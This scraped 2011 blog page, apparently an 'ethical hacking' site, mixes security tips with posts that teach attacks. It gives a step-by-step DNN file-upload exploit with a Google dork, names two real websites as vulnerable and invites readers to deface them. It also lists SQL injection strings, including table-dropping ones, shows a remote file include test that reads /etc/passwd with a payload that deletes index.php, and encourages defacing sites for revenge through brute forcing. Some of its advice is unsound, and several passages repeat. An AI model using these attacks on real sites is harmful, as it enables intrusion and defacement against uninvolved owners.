Learn Security and Ethical Hacking To prevent From Blackhats Hackers Now days there are so many Hackers and other pc experts are trying to steal passwords from innocent people who dont know what is
actually virus and what are the trojans which is used to steal passwords and TO crash pc and for Defacing sites
So our Blog contanins 100% Genuine,unique,legal and valid Data and licence to Show Hacking Content From Google AdWords program policies
in our Blog we are just telling about How to Secure yourself from Blackhat Hackers So you will surf
internet safely otherwise you might be the victim of hackers Due to this you can loss you Email accounts your private data you loss your Hosting Domain and All PC data
so here i am telling Few points keep in mind these are basic Factors to prevent from blackhats
1-Do not Download any File From unknown publisher or someone is trying to you Download a file.
2-in case you download that file Do not open first Look at size of file if it is under 1.5 MB Do not open it
3-Always clear your cookies and all internet History From software CCleaner so your Passwords will not save and you will be secure
4-Download an Antivirus and keep update that antivirus and dont use free version always use paid version buy a antivirus
5-i reffer You to Buy BitDefender Total Security antivirus or Microsoft Security Essentials
6-Must Purchase Kaspersky Anti hacker Software which prevent Attack servers to Steal password and give you ALL information about hacking server or Traojan if present in PC
7-Dont tell your password to anyone and dont reply any fake email from compainies thats real fraud nothing more
8-Do not login your password to any un trustes website because there might be phishing to steal your passwords
Showing posts with label learning section. Show all posts
Showing posts with label learning section. Show all posts
Tuesday, August 9, 2011
Saturday, August 6, 2011
Learn Security From beginning
All of young pc User always finding how to secure and how to crack into the other {victims} pc
So i am not giving you this idea for Blackhat Using i am giving this material to you for that you are able to
secure yourself from Hacking Attack from other Blackhats
So i am Giving you few E-books If you read these books you will find lots of useful material in That
Download Security For Beginners
Download Security Book Highly recommended
If you read These two Books and works on instructions Given in this Book regards Security and Ethical Hacking
i personally give you guarantee that in 6 month at stretch you work hard and join communities and so many matter given in books
you will become an Elite Ethical hacker after only 6 months
This article is written by liketalha
The hacker Who begins from end.
keep visiting LeGal Ethical security
So i am not giving you this idea for Blackhat Using i am giving this material to you for that you are able to
secure yourself from Hacking Attack from other Blackhats
So i am Giving you few E-books If you read these books you will find lots of useful material in That
Download Security For Beginners
Download Security Book Highly recommended
If you read These two Books and works on instructions Given in this Book regards Security and Ethical Hacking
i personally give you guarantee that in 6 month at stretch you work hard and join communities and so many matter given in books
you will become an Elite Ethical hacker after only 6 months
This article is written by liketalha
The hacker Who begins from end.
keep visiting LeGal Ethical security
Wednesday, July 20, 2011
WordPress Security/Vulnerability Scanner - WPScan
WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach (scanning without any prior knowledge of what has been installed etc).
Features
- Username enumeration (from author querystring and location header)
- Weak password cracking (multithreaded)
- Version enumeration (from generator meta tag)
- Vulnerability enumeration (based on version)
- Plugin enumeration (2220 most popular by default)
- Plugin vulnerability enumeration (based on version) (todo)
- Plugin enumeration list generation
- Other misc WordPress checks (theme name, dir listing, …)
Requirements
WPScan requires two non native Ruby gems, typhoeus and xml-simple. It should work on both Ruby 1.8.x and 1.9.x.
sudo apt-get install libcurl4-gnutls-devsudo gem install –user-install typhoeussudo gem install –user-install xml-simpleThe full README is available here.
You can download WPScan by checking it out from the SVN repository on Google Code:
svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-onlyOr you can read more here.
Sunday, June 26, 2011
learn Legal Ethical Hacking
Many Young Age PC users want to learn ethical Hacking But They DOnt know what to do and from wher we can hack and they are going to search hacking software of facebook gmail and other social and email sites i know there are elite hackerz available to make that kind of software but they dont give it for free and thousand of other hackers their self make fake software in which they attached trojans for when person downlaod that software they steal your private information so i have launch this copyright blog to teach newbies how to hack and crack and prevent from hackerz
5 Best Tips to learn hacking
1-watching tutorials from video site search on google and there are Guru courses also available fo ethical hacking
2-Learn programming coz this is the basic of Hacking if u Dont know programming you can do anything coz you dont know what the actual scene behind All this.
3-Find institution Ethical Hacking and Security Related and There you take tuitions from experts.
4-Join Hackers communities search on Google you find 1000 of Hackers communities.
5-Dont give up be creative try again and agian and Again yntil you are not successful if u Gave up one time you can never learn even Basics Of hacking.
Thanks Regards LikeTalha
Written by Also LikeTalHa {The Hacker Who Begins From End}
5 Best Tips to learn hacking
1-watching tutorials from video site search on google and there are Guru courses also available fo ethical hacking
2-Learn programming coz this is the basic of Hacking if u Dont know programming you can do anything coz you dont know what the actual scene behind All this.
3-Find institution Ethical Hacking and Security Related and There you take tuitions from experts.
4-Join Hackers communities search on Google you find 1000 of Hackers communities.
5-Dont give up be creative try again and agian and Again yntil you are not successful if u Gave up one time you can never learn even Basics Of hacking.
Thanks Regards LikeTalha
Written by Also LikeTalHa {The Hacker Who Begins From End}
Tuesday, February 15, 2011
Learn How to hack websites Using DNN [Dot Net Nuke] Exploit
Hack Website Using DNN [Dot Net Nuke] Exploit
Using google DORK try to find the vulnerable website.
inurl:"/portals/0"
You can also modify this google dork according to your need & requirement
I have found these 2 website vulnerable to this attack:
http://www.wittur.se/
http://www.bsd405.org/
n00bs can also try both of these websites for testing purpose.
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Simply copy paste it as shown below:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.
#########################################
What is RFI/LFI (Remote/Local File Include)
Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.Example Vulnerable Code - index.php (PHP)PHP Code:
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}?>Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server
PHP Code:
unlink("index.php");system("echo Hacked > index.php");?>Prevention from Sql Injection Attack in PHP
To avoid the sql injection attack, please follow the following simple mechanisms in PHP 1) Always restrict the length of the fields of form such as don’t allow more than 20 characters in the fields like username and password with the “maxlength” property available in the html form. 2) Always validate for the proper input like weather the value is valid email or not, is numeric or not , valid date or not etc. 3) Finally, Always use mysql_real_escape_string() function before sending the variable to the SQL query, it ad. For example note you must be connected to the database for using this function
Code:
$username=mysql_real_escape_string($_POST['username']); $password=mysql_real_escape_string($_POST['password']);
if a intruder inject ‘ OR 1 in the user name and password field then the value of the $username and $password will become \’ OR 1 which is not going to harm us anymore.
this might also help some one
.htaccess
Code:
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a What is SQL Injection?
SQL Injection
SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.
The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.
SQL injection vulnerabilities have three forms:
Incorrectly filtered special characters: escape characters
This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password = ’” + password + “‘;”
Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:
“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”
Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.
List of Some Important inputs used by hackers to use SQL Injection technique are:
a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –
On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%
Incorrectly handling input data type
This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!
If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:
1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –
Vulnerabilities inside the database server
Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—
1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.
In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.
SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.
The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.
SQL injection vulnerabilities have three forms:
Incorrectly filtered special characters: escape characters
This form of SQL injection occurs when the user manipulates the SQL statements using characters such as ’. For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password = ’” + password + “‘;”
Now suppose the userName and/or password so entered are” ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:
“SELECT * FROM users WHERE password =’ ‘or ‘1’=’1 ‘;”
Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.
List of Some Important inputs used by hackers to use SQL Injection technique are:
a) ‘ or ‘a’=’a
b) ‘ or 1=1 –
c) ‘ or 1=1; –
d) ‘; select * from *; –
e) ‘ (Single quote)(Here we look at the error)
f) ‘; drop table users –
On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%
Incorrectly handling input data type
This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!
If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:
1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –
Vulnerabilities inside the database server
Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—
1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.
In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.
Learn How To Hack A Website {Free Ethical Hacking Course Started}
Hacking a website or its member section
First of all,why you want to hack a webpage?Is it a certain webpage or any site at all? There are many reasons to hack a website, or a webmaster.Maybe you want to take a revenge or maybe you want to have fun or just learn how to do it ! You can deface the website which means replace the original index with a new one or you can gain access to the member area of the site which might be easier.
Defacing
You can deface the site through telnet or your browser by running remote commands on an old or misconfigured server, the hard thing to do is find an old server , maybe a network of a school or university would do,get a CGI BUG searcher.This program will scan ranges of IPs for web-servers and will scan them for known bugs in their cgis or other bugs and holes.You can learn how to exploite a certain hole by adding in yahoo the name of the bug/hole and the word exploit,search for " cmd.exe exploit".There are more than 700 holes that many servers might have! You can also deface a website by finding the ftp password and just browse through the sites ftp and replace the index.htm.You do that with the : Brute forceTo do that you need a brute forcer or brute force attacker and some word lists,the brute forcer sends multiple user/pass requests of words that picks up from namelists and tries to hack the account untill it does! So lets say imagine a porn site that asks for a password , you go there you copy their address , you add the address in a program called brute forcer and then from the brute forcer you choose a text file with names to be used as usernames and a text with names to be used as passwords,the brute forcer will try untill it finds a correct user/pass This should be easier for the newbies than exploiting cgi bugs , many of the newbies havent even heard of it i hope i didnt confuse you with this tutorial there might be more tuts about web hacking and cgi bugs and such.Till then try to find the way to cgi bugs yourself with the cgi scanners in the Web Hacks section or download a brute force to crack accounts.
First of all,why you want to hack a webpage?Is it a certain webpage or any site at all? There are many reasons to hack a website, or a webmaster.Maybe you want to take a revenge or maybe you want to have fun or just learn how to do it ! You can deface the website which means replace the original index with a new one or you can gain access to the member area of the site which might be easier.
Defacing
